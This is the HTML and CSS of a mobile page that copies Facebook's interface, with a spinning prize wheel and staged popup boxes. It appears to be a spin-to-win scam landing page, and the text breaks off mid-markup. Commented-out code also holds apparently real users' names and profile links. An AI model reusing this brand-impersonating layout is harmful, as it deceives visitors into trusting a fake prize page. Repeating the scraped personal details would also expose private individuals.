<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
    <base href="">

    <title>Facebook</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="">
    <meta name="keywords" content="">
    <meta name="robots" content="noindex,nofollow">
    <link href="css.css" rel="stylesheet" type="text/css">
    <link rel="stylesheet" type="text/css" id="KH5Fu" href="5m9xO6DThVP.css">
    <link rel="stylesheet" type="text/css" id="Httuo" href="tJWT_DY8hZK.css">
    <link rel="icon" href="fa.ico" type="image/x-icon" />
    <link rel="stylesheet" type="text/css" id="ejjUR" href="IhxJn_bz-WF.css">

    <style>
        body, div, fieldset, form, h1, h2, h3, h4, h5, h6, input, legend, select, table, tbody, td, textarea, th, tr {
            margin: 0;
            padding: 0;
            font-size: 14px;
            font-family: Helvetica Neue, Helvetica, Arial, sans-serif !important;
        }

        img {
            border: none
        }

        sup {
            vertical-align: text-top
        }

        sub {
            vertical-align: text-bottom
        }

        input, select, textarea {
            font-size: inherit;
            font-weight: inherit
        }

        *, :after, :before {
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
            text-rendering: optimizeLegibility !important;
            -webkit-font-smoothing: antialiased !important
        }

        * {
            font-family: Helvetica Neue, Helvetica, Arial, sans-serif;
            font-weight: 300
        }

        .fr {
            float: right
        }

        .fl {
            float: left
        }

        .cf:after, .cf:before {
            content: " ";
            display: block;
            height: 0;
            overflow: hidden
        }

        .cf:after {
            clear: both
        }

        .cf {
            zoom: 1
        }

        .container {
            max-width: 680px
        }

        body {
            background-color: #fff
        }

        header {
            width: 100%;
            height: 45px;
            border-bottom: 2px solid #edeeee
        }

        header .logo {
            float: left;
            width: 70px;
            height: 25px;
            margin: 11px 0 0 11px
        }

        header .logo img {
            width: 100%
        }

        header .search {
            float: left;
            width: calc(100% - 170px);
            height: 30px;
            border: 1px solid #edeeee;
            border-radius: 15px;
            text-align: center;
            line-height: 30px;
            color: #818488;
            font-size: 13px;
            margin: 6px 0 0 15px
        }

        header .log {
            float: right;
            width: 50px;
            color: #125688;
            font-size: 13px;
            margin: 12px 4px 0 0
        }

        .downloadApp {
            width: 100%;
            height: 55px;
            background-color: #2b2d2e
        }

        .downloadApp .logo {
            float: left;
            width: 29px;
            height: 29px;
            margin: 11px 0 0 11px
        }

        .downloadApp .text {
            float: left;
            width: calc(100% - 150px);
            line-height: 1.39;
            font-size: 11px;
            color: #fff;
            padding-left: 11px;
            margin-top: 8px
        }

        .author .btn, .author .name, .downloadApp .text > span {
            font-size: 13px
        }

        .downloadApp .btn {
            float: right;
            width: 48px;
            height: 28px;
            line-height: 27px;
            border: 1px solid #fff;
            border-radius: 3px;
            text-align: center;
            font-size: 13px;
            font-weight: 600;
            color: #fff;
            margin: 14px 11px 0 0
        }

        .author {
            width: 100%;
            height: 65px;
            border-bottom: 1px solid #eeefef
        }

        .author .profile {
            float: left;
            width: 30px;
            height: 30px;
            border-radius: 15px;
            overflow: hidden;
            margin: 16px 0 0 11px;
            border: 1px solid #cdd4d6
        }

        .author .profile img {
            width: 100%;
            height: 100%
        }

        .author .name {
            float: left;
            width: calc(100% - 150px);
            color: #125688;
            font-weight: 600;
            margin: 21px 0 0 11px
        }

        .author .btn {
            float: right;
            width: 80px;
            height: 30px;
            border: 1px solid #4090db;
            border-radius: 2px;
            text-align: center;
            font-weight: 600;
            color: #4090db;
            line-height: 28px;
            margin: 16px 11px 0 0
        }

        .topFeed .spin {
            width: 100%;
            text-align: center;
            padding: 11px;
            position: relative;
            height: 310px;
            top: 15%;
            overflow: hidden
        }

        .topFeed .spin .wheel {
            position: absolute;
            top: 6px;
            left: 47%;
            margin: 0 0 0 -130px;
            width: 290px;
            height: 290px;
            background: url(wheel.png) no-repeat;
            background-size: cover;
            z-index: 2
        }

        .topFeed .spin .stopper {
            position: absolute;
            top: 48%;
            left: 51%;
            margin: -44px 0 0 -38px;
            width: 79px;
            height: 87px;
            background: url(spinStop.png) no-repeat;
            background-size: cover;
            z-index: 3
        }

        .topFeed .spin .wheel.firstSpin {
            animation: firstSpin 6.6s ease 0s forwards;
            -webkit-animation: firstSpin 6.6s ease 0s forwards;
            -moz-animation: firstSpin 6.6s ease 0s forwards;
        }

        .topFeed .spin .wheel.secondSpin {
            animation: secondSpin 6.6s ease 0s forwards;
            -webkit-animation: secondSpin 6.6s ease 0s forwards;
            -moz-animation: secondSpin 6.6s ease 0s forwards;
        }

        .comments {
            width: 100%;
            margin-top: -9px;
            background: #fff;
        }

        .comments .likes {
            width: 100%;
            line-height: 30px;
            height: 43px;
            font-size: 14px
        }

        .comments .likes .counter {
            float: left;
            width: 60%;
            text-align: left;
            color: #4b4f54
        }

        .comments .likes .time {
            float: right;
            width: 30%;
            text-align: right;

            padding-top: 10px;
            color: #657786;
            -webkit-flex-shrink: 0;
            -ms-flex-negative: 0;
            flex-shrink: 0;
            margin-left: .6rem;
            -webkit-order: 1;
            -ms-flex-order: 1;
            order: 1;
            white-space: nowrap;
        }

        .comments ul {
            font-family: Helvetica Neue, Helvetica, Arial, sans-serif;
            margin: 0;
            padding: 0;
            margin-top: 30px;
            padding: 3%;
            list-style: none
        }

        .comments ul li {
            width: 100%;
            padding: 7px 0;
            color: #4b4f54;
            font-size: 13px;
            font-family: Helvetica Neue, Helvetica, Arial, sans-serif;
        }

        .comments ul li > span {
            font-family: Helvetica Neue, Helvetica, Arial, sans-serif;
            color: #14171a;
        }

        .comments ul li > span span {
            font-family: Helvetica Neue, Helvetica, Arial, sans-serif;
            color: #657786;
            font-weight: 400;
        }

        .comments ul li > span:first-child {
            font-weight: 600
        }

        .popupCover {
            width: 100%;
            position: fixed;
            top: 0;
            bottom: 0;
            z-index: 13;
            background: rgba(0, 0, 0, .4);
            padding-top: 6%
        }

        .popupCover .box {
            position: absolute;
            width: 98%;
            left: 1%;
            border-radius: 3px;
            padding: 6% 10%;
            margin: auto;
            background: #fff;
            text-align: center;
            display: none;
            box-shadow: 0 2px 1px 0 rgba(199, 202, 206, .8);
            color: #282828;
            font-size: 16px
        }

        .popupCover .box img {
            max-width: 50%
        }

        .popupCover .box.active {
            display: block
        }

        .popupCover .box .title {
            width: 100%;
            text-align: center;
            font-size: 18px;
            color: #14171a;
            font-weight: 700;

            margin: 10px 0 25px;
            line-height: 1.5
        }

        .popupCover .box .text > span {
            color: #f03;
            font-weight: 600
        }

        .popupCover .box .button {
            display: block;
            width: 80%;
            height: 40px;
            line-height: 37px;
            background-image: linear-gradient(rgba(255, 255, 255, .9), rgba(255, 255, 255, 0));
            text-shadow: 0 1px 1px rgba(255, 255, 255, .75);
            border: 1px solid #ccc;

            margin: 20px auto 0;

            border-radius: 3px;
            box-sizing: border-box;
            font-weight: bold;
            position: relative;
            -webkit-user-select: none;
            z-index: 0;
            background-color: #f6f7f9;
            color: #4b4f56;
        }

        .popupCover .box::after {
            border-image: url(NUaYXqGFs1B.png) 80 90 90 90 repeat;
        }

        .popupCover .box::after {
            border-color: transparent;
            border-image: url(jl0WEuJhd9F.png) 40 45 45 45 repeat;
            border-style: solid;
            border-width: 40px 45px 45px;
            bottom: -28px;
            content: '';
            left: -24px;
            pointer-events: none;
            position: absolute;
            right: -24px;
            top: -16px;
        }

        .popupCover .box .button::after {
            border-image: url(xPl8WVawWbA.png) 14 14 14 14 repeat;
        }

        .popupCover #first {
            z-index: 1
        }

        .popupCover #third {
            z-index: 3
        }

        .popupCover #last {
            z-index: 5
        }

        @-webkit-keyframes firstSpin {
            0% {
                transform: rotate(0deg);
                -webkit-transform: rotate(0deg);
                -moz-transform: rotate(0deg);
            }
            90% {
                transform: rotate(3250deg);
                -webkit-transform: rotate(3250deg);
                -moz-transform: rotate(3250deg);
            }
            95% {
                transform: rotate(3240deg);
                -webkit-transform: rotate(3240deg);
                -moz-transform: rotate(3240deg);
            }
            100% {
                transform: rotate(3241deg);
                -webkit-transform: rotate(3241deg);
                -moz-transform: rotate(3241deg);
            }
        }

        @-webkit-keyframes secondSpin {
            0% {
                transform: rotate(3241deg);
                -webkit-transform: rotate(3241deg);
                -moz-transform: rotate(3241deg);
            }
            90% {
                transform: rotate(6615deg);
                -webkit-transform: rotate(6615deg);
                -moz-transform: rotate(6615deg);
            }
            95% {
                transform: rotate(6605deg);
                -webkit-transform: rotate(6605deg);
                -moz-transform: rotate(6605deg);
            }
            100% {
                transform: rotate(6606deg);
                -webkit-transform: rotate(6606deg);
                -moz-transform: rotate(6606deg);
            }
        }

        ._3f2NsD-H {
            -webkit-align-items: stretch;
            -ms-flex-align: stretch;
            align-items: stretch;
            border-width: 0;
            border-style: solid;
            box-sizing: border-box;
            display: -webkit-flex;
            display: -ms-flexbox;
            display: flex;
            -webkit-flex-basis: auto;
            -ms-flex-preferred-size: auto;
            flex-basis: auto;
            -webkit-flex-direction: column;
            -ms-flex-direction: column;
            flex-direction: column;
            -webkit-flex-shrink: 0;
            -ms-flex-negative: 0;
            flex-shrink: 0;
            margin: 0;
            padding: 0;
            position: relative;
            background-color: transparent;
            color: inherit;
            font: inherit;
            text-align: inherit;
            text-decoration: none;
            list-style: none;
            min-height: 0;
            min-width: 0
        }

        .iAtUftTW {
            left: 0;
            right: 0;
            top: 0;
            z-index: 9;
        }

        ._3_Vt_6uC {
            /*height: 3.28125rem;*/
            z-index: 1;
        }

        ._1f9hEUrs {
            -webkit-align-items: center;
            -ms-flex-align: center;
            -ms-grid-row-align: center;
            align-items: center;
            background-color: #fff;
            border-bottom: 1px solid #ccd6dd;
            color: #1da1f2;
            /*height: 3.28125rem;*/
        }

        ._2ueZ5o9q, ._3TMKJ7yy {
            left: 0;
            position: fixed;
            right: 0;
            top: 0px;
            -webkit-transform: translateZ(0);
            transform: translateZ(0);
        }

        ._2ZoxDI7c {
            color: #657786;
        }

        ._3TMKJ7yy {
            height: 2.8rem;
        }

        ._2ZZR2W6-, ._3xujJ3kq {
            box-sizing: border-box;
            margin: 0 auto;
            width: 100%;
        }

        @media screen and (min-width: 360px) {
            ._2ZZR2W6-, ._3xujJ3kq {
                max-width: 400px !important;
            }
        }

        ._3TooTCWf {
            height: 100%;
        }

        ._1CuE6zIr {
            -webkit-align-items: stretch;
            -ms-flex-align: stretch;
            -ms-grid-row-align: stretch;
            align-items: stretch;
            -webkit-flex-direction: row;
            -ms-flex-direction: row;
            flex-direction: row;
        }

        ._29jxnnMY {
            -webkit-justify-content: space-between;
            -ms-flex-pack: justify;
            justify-content: space-between;
        }

        ._1CuE6zIr, ._2QuQvRFT {
            -webkit-flex-grow: 1;
            -ms-flex-positive: 1;
            flex-grow: 1;
        }

        ._2ZoxDI7c:active, ._2ZoxDI7c:focus, ._2ZoxDI7c:hover, ._4yIJEcYy {
            color: #1da1f2;
        }

        svg:not(:root) {
            overflow: hidden;
        }

        ._20oY9XAa {
            height: 1.96875rem !important;
        }

        ._4yIJEcYy {
            box-shadow: inset 0 -5px;
        }

        ._2lC1S_bA {
            background-color: #1da1f2;
            border-radius: .214rem;
            box-shadow: 0 0 0 .14rem #fff;
            font-size: .714rem;
            height: 1rem;
            left: 60%;
            line-height: 1rem;
            min-width: .85rem;
            padding: 0 .214rem;
            position: absolute;
            text-align: center;
            top: 25%;
        }

        ._2lC1S_bA._1mk4-RhK {
            border: 0;
            border-radius: .214rem;
            box-shadow: none;
            height: .428rem;
            left: 70%;
            min-width: 0;
            width: .428rem;
        }

        ._1-I0zYji {
            background-color: #fff;
            border: 0;
            border-radius: .35rem;
            display: block;
            min-height: 0;
            -moz-force-broken-image-icon: 1;
        }

        ._20oY9XAa {
            height: 1.96875rem !important;
        }

        ._3TooTCWf {
            height: 100%;
        }

        @media screen and (min-width: 360px) {
            ._2ZZR2W6-, ._3xujJ3kq {
                max-width: 400px !important;
            }

            ._2ZZR2W6-, ._3xujJ3kq {
                box-sizing: border-box;
                margin: 0 auto;
                width: 100%;
            }
        }

        ._2QuQvRFT, .mZfBpe3n {
            -webkit-justify-content: center;
            -ms-flex-pack: center;
            justify-content: center;
        }

        ._2QuQvRFT {
            -webkit-align-items: center;
            -ms-flex-align: center;
            align-items: center;
            display: -webkit-flex;
            display: -ms-flexbox;
            display: flex;
            flex-directon: column;
            width: 3.9375rem;
        }

        ._3ITjOJ53 {
            position: fixed;
            background: #fff;
            -webkit-flex-direction: row;
            -ms-flex-direction: row;
            flex-direction: row;
            padding: 1rem 1rem;
            width: 100%;
            border-bottom: 1px solid #ccd6dd;
            z-index: 8;
        }

        ._2bD9aoU5 {
            -webkit-flex-basis: auto;
            -ms-flex-preferred-size: auto;
            flex-basis: auto;
            -webkit-flex-grow: 1;
            -ms-flex-positive: 1;
            flex-grow: 1;
            height: 46px;
        }

        ._3SNKsHhe {
            font-size: 1.25rem;
            line-height: 1.5em;
        }

        .Fe7ul3Lt {
            color: inherit;
            display: inline;
            font: inherit;
            margin: 0;
            padding: 0;
            text-decoration: none;
            word-wrap: break-word;
            background-color: transparent;
            text-align: inherit;
        }

        ._2ZBD52R7 {
            color: #1b95e0;
            display: -webkit-flex;
            display: -ms-flexbox;
            display: flex;
            -webkit-flex-grow: 0;
            -ms-flex-positive: 0;
            flex-grow: 0;
            border: 1px solid #1b95e0;
            height: 40px;
            -webkit-justify-content: center;
            -ms-flex-pack: center;
            justify-content: center;
            width: 56px;
            margin-top: 8px;
            border-radius: 5px;
        }

        a {
            color: #1da1f2;
            text-decoration: none;
        }

        .slbZ9IfU {
            height: 1.96875rem !important;
        }

        ._2DggF3sL {
            font-family: Helvetica Neue, Helvetica, Arial, sans-serif;
            font-size: 1rem;
            font-weight: 400;
            line-height: 1.3125;
            word-wrap: break-word;
            -webkit-font-feature-settings: "kern" 1;
            font-feature-settings: "kern" 1;
            -webkit-font-kerning: normal;
            font-kerning: normal;
            text-rendering: optimizeLegibility;
        }

        ._3SNKsHhe {
            font-size: 1.25rem;
            line-height: 38px;
        }

        button, input, optgroup, select, textarea {
            color: inherit;
            font: inherit;
            margin: 0;
        }

        .FaFY-n1u {
            border-bottom: 1px solid #ccd6dd;
        }

        ._1m5BUHLW {
            padding: 1rem .6rem;
        }

        .iT9BSTFM {
            margin: 0 -.3rem;
        }

        ._3Ho4vlTO {
            -webkit-flex-direction: row;
            -ms-flex-direction: row;
            flex-direction: row;
        }

        .iT9BSTFM > ._2rKrV7oY {
            margin: 0 .3rem;
        }

        ._2nTZvTlq {
            -webkit-flex-grow: 1;
            -ms-flex-positive: 1;
            flex-grow: 1;
        }

        ._2rKrV7oY {
            -webkit-flex-basis: 0;
            -ms-flex-preferred-size: 0;
            flex-basis: 0;
            min-width: 0;
        }

        ._1o0_Y1o3 {
            display: block;
            width: 100%;
        }

        ._1-I0zYji {
            background-color: #fff;
            border: 0;
            border-radius: .35rem;
            display: block;
            min-height: 0;
            -moz-force-broken-image-icon: 1;
        }

        .cseLQqHs {
            -webkit-flex-direction: row;
            -ms-flex-direction: row;
            flex-direction: row;
        }

        ._3hdqTVua > *, .cseLQqHs {
            margin-top: .65625rem;
        }

        ._2nlNLE4W {
            color: #657786;
            display: block;
            margin-right: 10%;
        }

        ._1LIz1mtY {
            background: transparent;
            border: 0;
            color: inherit;
            cursor: pointer;
            font: inherit;
            margin: 0;
            overflow: visible;
            padding: 0;
            -webkit-user-select: none;
            -moz-user-select: none;
            -ms-user-select: none;
            user-select: none;
            white-space: nowrap;
        }

        ._264wtbb4 {
            -webkit-align-items: center;
            -ms-flex-align: center;
            align-items: center;
            display: -webkit-flex;
            display: -ms-flexbox;
            display: flex;
        }

        ._2nlNLE4W {
            color: #657786;
            display: block;
            margin-right: 10%;
        }

        .he, .he2, .he3 {
            height: 1.5rem !important;
        }

        ._132qLRA5 {
            height: 1.5em !important;
        }
    </style>
</head>
<body class="touch x2 ios sf _fzu _50-3 _2v9s portrait">

<div class="container">

    <div class="_129-">
        <div class="_55wp _52z5 _451a _3qet _17gp" id="header" data-sigil="MTopBlueBarHeader">
            <div class="_4g33 _52we" id="mJewelNav" data-autoid="autoid_9">
                <div class="_4g34">
                    <div class="_59te jewel popoverOpen noCount" data-store="{&quot;tab&quot;:&quot;feed&quot;}"
                         id="feed_jewel" data-sigil="nav-popover feed"><a class="_19no touchable" accesskey="1"
                                                                          href="https://m.facebook.com/home.php?refid=8"
                                                                          data-sigil="icon blocking-touchable"><span
                            style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">动态消息</span>
                        <div class="_59tf"><span class="_59tg" data-sigil="count">0</span></div>
                    </a></div>
                </div>
                <div class="_4g34">
                    <div class="_59te jewel noCount" data-store="{&quot;tab&quot;:&quot;requests&quot;}"
                         id="requests_jewel" data-sigil="nav-popover requests"><a class="_19no touchable"
                                                                                  data-store="{&quot;behavior&quot;:&quot;custom&quot;}"
                                                                                  href="https://m.facebook.com/friends/center/requests/?refid=8"
                                                                                  accesskey="2"
                                                                                  data-sigil="icon blocking-touchable"
                                                                                  data-autoid="autoid_3"
                                                                                  role="button" aria-haspopup="true"
                                                                                  aria-controls="reqs_flyout"
                                                                                  aria-pressed="false"><span
                            style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">加好友请求</span>
                        <div class="_59tf"><span class="_59tg" data-sigil="count">0</span></div>
                    </a>

                    </div>
                </div>
                <div class="_4g34">
                    <div class="_59te jewel noCount" data-store="{&quot;tab&quot;:&quot;messages&quot;}"
                         id="messages_jewel" data-sigil="nav-popover messages"><a class="_19no touchable"
                                                                                  data-store="{&quot;behavior&quot;:&quot;custom&quot;}"
                                                                                  accesskey="3"
                                                                                  href="https://m.facebook.com/messages/?refid=8"
                                                                                  data-sigil="icon blocking-touchable"
                                                                                  data-autoid="autoid_5"
                                                                                  role="button" aria-haspopup="true"
                                                                                  aria-controls="messages_flyout"
                                                                                  aria-pressed="false"><span
                            style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">消息</span>
                        <div class="_59tf"><span class="_59tg" data-sigil="count">0</span></div>
                    </a>

                    </div>
                </div>
                <div class="_4g34">
                    <div class="_59te jewel _2jdm hasCount" data-store="{&quot;tab&quot;:&quot;notifications&quot;}"
                         id="notifications_jewel" data-sigil="nav-popover notifications"><a class="_19no touchable"
                                                                                            data-store="{&quot;behavior&quot;:&quot;custom&quot;}"
                                                                                            accesskey="4"
                                                                                            href="https://m.facebook.com/notifications.php?refid=8"
                                                                                            data-sigil="icon blocking-touchable"
                                                                                            data-autoid="autoid_7"
                                                                                            role="button"
                                                                                            aria-haspopup="true"
                                                                                            aria-controls="notifications_flyout"
                                                                                            aria-pressed="false"><span
                            style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">通知</span>
                        <div class="_59tf"><span class="_59tg" data-sigil="count">3</span></div>
                    </a>
                        <!--<div class="flyout popover_hidden popover_flyout" role="complementary"-->
                        <!--id="notifications_flyout" data-sigil="flyout flyout" aria-hidden="true"-->
                        <!--aria-expanded="false" data-autoid="autoid_8">-->
                        <!--<div data-sigil="flyout-content context-layer-root">-->
                        <!--<header class="_52je _52jb _52jh _4g33 _52we _2pi8 _2pi4" tabindex="0">-->
                        <!--<div class="_4g34">通知</div>-->
                        <!--<div class="_5s61"><a class="button touchable" role="button"-->
                        <!--href="https://m.facebook.com/settings/notifications/?refid=8"-->
                        <!--aria-label="通知设置" data-sigil="blocking-touchable"><span-->
                        <!--class="_5r0s _5r0v img"><i-->
                        <!--class="_5r0t _4q9b img sp_wjHZ4C6NZQW_3x sx_38ff8e"></i><i-->
                        <!--class="_5r0u _4q9b img sp_wjHZ4C6NZQW_3x sx_4d3ebc"></i></span></a>-->
                        <!--</div>-->
                        <!--</header>-->
                        <!--<div>-->
                        <!--<ol class="_7k7 inner _1azv" data-sigil="contents">-->
                        <!--<li class="acw" id="u_0_e" data-sigil="live-notifications marea"></li>-->
                        <!--&lt;!&ndash;<li class="aclb abt" id="notif_1472016684267370"&ndash;&gt;-->
                        <!--&lt;!&ndash;data-sigil="notification marea">&ndash;&gt;-->
                        <!--&lt;!&ndash;<div class="touchable-notification"><a class="touchable"&ndash;&gt;-->
                        <!--&lt;!&ndash;data-store="{&quot;notif_id&quot;:1472016684267370}"&ndash;&gt;-->
                        <!--&lt;!&ndash;href="https://m.facebook.com/profile.php?id=100010919737987&amp;notif_t=pymk_email&amp;notif_id=1472016684267370&amp;ref=m_notif&amp;refid=8"&ndash;&gt;-->
                        <!--&lt;!&ndash;&lt;!&ndash;data-sigil="touchable">&ndash;&gt;&ndash;&gt;-->
                        <!--&lt;!&ndash;&lt;!&ndash;<div class="ib"><i class="img l profpic" aria-label="Darren White"&ndash;&gt;&ndash;&gt;-->
                        <!--&lt;!&ndash;&lt;!&ndash;role="img"&ndash;&gt;&ndash;&gt;-->
                        <!--&lt;!&ndash;&lt;!&ndash;style="background:#d8dce6 url(&quot;https://fbcdn-profile-a.akamaihd.net/hprofile-ak-xfa1/v/t1.0-1/cp0/e15/q65/p120x120/13692647_271993476507975_8528009141091208562_n.jpg?efg=eyJpIjoidCJ9&amp;oh=8dd433869e480a6f40cb7382b2c3353a&amp;oe=58737B2D&amp;__gda__=1485183836_062af00d33ea2b8beb6a3a19958cc73f&quot;) no-repeat center;background-size:100% 100%;-webkit-background-size:100% 100%;width:40px;height:40px;"></i>&ndash;&gt;&ndash;&gt;-->
                        <!--&lt;!&ndash;&lt;!&ndash;&lt;!&ndash;<div class="c">你认识 Darren White 吗？<br><i&ndash;&gt;&ndash;&gt;&ndash;&gt;-->
                        <!--&lt;!&ndash;&lt;!&ndash;&lt;!&ndash;class="img sp_HM611xgyKAW_3x sx_9ac3d9"></i>&nbsp;<span&ndash;&gt;&ndash;&gt;&ndash;&gt;-->
                        <!--&lt;!&ndash;&lt;!&ndash;&lt;!&ndash;class="mfss fcg"><abbr&ndash;&gt;&ndash;&gt;&ndash;&gt;-->
                        <!--&lt;!&ndash;&lt;!&ndash;&lt;!&ndash;data-store="{&quot;time&quot;:1472016684,&quot;short&quot;:false,&quot;forceseconds&quot;:false}"&ndash;&gt;&ndash;&gt;&ndash;&gt;-->
                        <!--&lt;!&ndash;&lt;!&ndash;&lt;!&ndash;data-sigil="timestamp"&ndash;&gt;&ndash;&gt;&ndash;&gt;-->
                        <!--&lt;!&ndash;&lt;!&ndash;&lt;!&ndash;data-store-id="1">8月24日</abbr></span></div>&ndash;&gt;&ndash;&gt;&ndash;&gt;-->
                        <!--&lt;!&ndash;&lt;!&ndash;</div>&ndash;&gt;&ndash;&gt;-->
                        <!--&lt;!&ndash;</a></div>&ndash;&gt;-->
                        <!--&lt;!&ndash;</li>&ndash;&gt;-->
                        <!--<li class="aclb abt" id="notif_1471868526152172"-->
                        <!--data-sigil="notification marea">-->
                        <!--<div class="touchable-notification"><a class="touchable"-->
                        <!--data-store="{&quot;notif_id&quot;:1471868526152172}"-->
                        <!--href="https://m.facebook.com/profile.php?id=100010552534936&amp;notif_t=pymk_email&amp;notif_id=1471868526152172&amp;ref=m_notif&amp;refid=8"-->
                        <!--data-sigil="touchable">-->
                        <!--<div class="ib"><i class="img l profpic" aria-label="MD Jahangir"-->
                        <!--role="img"-->
                        <!--style="background:#d8dce6 url(&quot;https://fbcdn-profile-a.akamaihd.net/hprofile-ak-xap1/v/t1.0-1/cp0/e15/q65/p120x120/14034951_298504930511256_3403942532502060637_n.jpg?efg=eyJpIjoidCJ9&amp;oh=bbee39805b7398a72f4d57d4492f4f8c&amp;oe=583FE99D&amp;__gda__=1484160478_7baec338b0f7165476d7008b74239629&quot;) no-repeat center;background-size:100% 100%;-webkit-background-size:100% 100%;width:40px;height:40px;"></i>-->
                        <!--<div class="c">你认识 MD Jahangir 吗？<br><i-->
                        <!--class="img sp_HM611xgyKAW_3x sx_9ac3d9"></i>&nbsp;<span-->
                        <!--class="mfss fcg"><abbr-->
                        <!--data-store="{&quot;time&quot;:1471868526,&quot;short&quot;:false,&quot;forceseconds&quot;:false}"-->
                        <!--data-sigil="timestamp"-->
                        <!--data-store-id="2">8月22日</abbr></span></div>-->
                        <!--</div>-->
                        <!--</a></div>-->
                        <!--</li>-->
                        <!--<li class="aclb abt" id="notif_1471665092105541"-->
                        <!--data-sigil="notification marea">-->
                        <!--<div class="touchable-notification"><a class="touchable"-->
                        <!--data-store="{&quot;notif_id&quot;:1471665092105541}"-->
                        <!--href="https://m.facebook.com/camilla.ursos?notif_t=pymk_email&amp;notif_id=1471665092105541&amp;ref=m_notif&amp;refid=8"-->
                        <!--data-sigil="touchable">-->
                        <!--<div class="ib"><i class="img l profpic" aria-label="Camilla Ursos"-->
                        <!--role="img"-->
                        <!--style="background:#d8dce6 url(&quot;https://fbcdn-profile-a.akamaihd.net/hprofile-ak-xta1/v/t1.0-1/cp0/e15/q65/p120x120/13880293_727688427370018_1509584182379775397_n.jpg?efg=eyJpIjoidCJ9&amp;oh=23328a5126d4f75ad85b2c2db4134066&amp;oe=587CA3D9&amp;__gda__=1484947201_f0f44b55e8fc7aea574ef90b22e46d59&quot;) no-repeat center;background-size:100% 100%;-webkit-background-size:100% 100%;width:40px;height:40px;"></i>-->
                        <!--<div class="c">你认识 Camilla Ursos 吗？<br><i-->
                        <!--class="img sp_HM611xgyKAW_3x sx_9ac3d9"></i>&nbsp;<span-->
                        <!--class="mfss fcg"><abbr-->
                        <!--data-store="{&quot;time&quot;:1471665092,&quot;short&quot;:false,&quot;forceseconds&quot;:false}"-->
                        <!--data-sigil="timestamp"-->
                        <!--data-store-id="3">8月20日</abbr></span></div>-->
                        <!--</div>-->
                        <!--</a></div>-->
                        <!--</li>-->
                        <!--<li class="item more acw abt" data-sigil="marea"><a-->
                        <!--class="touchable primary"-->
                        <!--href="https://m.facebook.com/notifications.php?more&amp;refid=8"-->
                        <!--data-sigil="touchable">-->
                        <!--<div class="primarywrap">-->
                        <!--<div class="content">-->
                        <!--<div class="title mfsm fcl"><strong>所有通知</strong></div>-->
                        <!--</div>-->
                        <!--</div>-->
                        <!--</a></li>-->
                        <!--</ol>-->
                        <!--</div>-->
                        <!--</div>-->
                        <!--</div>-->
                    </div>
                </div>
                <div class="_4g34">
                    <div class="_59te jewel noCount" data-store="{&quot;tab&quot;:&quot;search&quot;}"
                         id="search_jewel" data-sigil="nav-popover search"><a class="_19no touchable"
                                                                              href="https://m.facebook.com/search/?refid=8"
                                                                              role="button"
                                                                              data-sigil="icon blocking-touchable"><span
                            style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">搜索</span>
                        <div class="_59tf"><span class="_59tg" data-sigil="count">0</span></div>
                    </a>

                    </div>
                </div>
                <div class="_4g34">
                    <div class="_59te jewel noCount" data-store="{&quot;tab&quot;:&quot;bookmarks&quot;}"
                         id="bookmarks_jewel" data-nocookies="1" data-sigil="nav-popover bookmarks"><a
                            class="_19no touchable" href="https://m.facebook.com/#" role="button"
                            data-sigil="menu-link icon blocking-touchable"><span
                            style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">主菜单</span>
                        <div class="_59tf"><span class="_59tg" data-sigil="count">0</span></div>
                    </a>

                    </div>
                </div>
            </div>
            <div id="u_0_9">
                <div class="" id="u_0_1d"></div>
            </div>
        </div>
    </div>


    <div class="topFeed" style="background:#fff;height: 400px;border-radius: 3px">
        <div class="spin">
            <div class="stopper"></div>
            <div class="wheel"></div>
        </div>
    </div>
    <div class="comments">
        <div class="likes">
            <footer class="_22rc">
                <div class="_2ip_" id="feedback_inline_1191456267579819" data-sigil="mufi-inline">
                    <div class="_34qc _3hxn _3myz"><a
                            href="/RobertDowneyJrBrazil/photos/a.402453273146793.89622.398414730217314/1191456267579819/?type=3&amp;refid=8&amp;_ft_=qid.6329709165628833554%3Amf_story_key.-2286654974156704102"
                            data-sigil="feed-ufi-trigger">
                        <div class="_rnk _2eo- _1e6" id="u_0_1n" data-sigil="reactions-bling-bar">
                            <div class="_1w1k" data-sigil="reactions-sentence-container"><span class="_qfz"><div
                                    class="_1g05" style="z-index:3" data-sigil="reactions-bling-flyout"><i
                                    class="img sp_EZIgTnbFtq5_3x sx_eacae1"><u>Like</u></i></div><div class="_1g05"
                                                                                                   style="z-index:2"
                                                                                                   data-sigil="reactions-bling-flyout"><i
                                    class="img sp_EZIgTnbFtq5_3x sx_946dae"><u>大爱</u></i></div><div class="_1g05"
                                                                                                    style="z-index:1"
                                                                                                    data-sigil="reactions-bling-flyout"><i
                                    class="img sp_EZIgTnbFtq5_3x sx_efab06"><u>笑趴</u></i></div></span>
                                <div class="_1g06" aria-label="2,006 个心情" data-sigil="feed-ufi-sentence">2,006</div>
                            </div>
                            <div class="_1fnt"><span class="_1j-c">17 Comments</span><span class="_1j-c">46 Shares</span></div>
                        </div>
                    </a></div>
                    <div class="_52jh _4g33 _15kk _15ks _15km" data-sigil="ufi-inline-actions">
                        <div class="_52jj _15kl _3hwk _4g34"><a class="_15ko _5a-2 touchable"
                                                                data-store="{&quot;reaction&quot;:0,&quot;feedbackTarget&quot;:1191456267579819}"
                                                                aria-pressed="false" role="button" id="u_0_1o"
                                                                data-sigil="touchable ufi-inline-like like-reaction-flyout"
                                                                data-autoid="autoid_15"
                                                                data-uri="https://m.facebook.com/ufi/reaction/?ft_ent_identifier=1191456267579819&amp;reaction_type=1&amp;story_render_location=feed_mobile&amp;feedback_source=1&amp;ext=1474009460&amp;hash=AeTf0Rmo6kKPtwj-&amp;refid=8&amp;_ft_=qid.6329709165628833554%3Amf_story_key.-2286654974156704102">Like</a>
                            <div class="_1ekf" role="link" tabindex="-1" data-sigil="screenreader-reactions-trigger">

                            </div>
                        </div>
                        <div class="_52jj _15kl _3hwk _4g34"><a class="_15kq _5a-2"
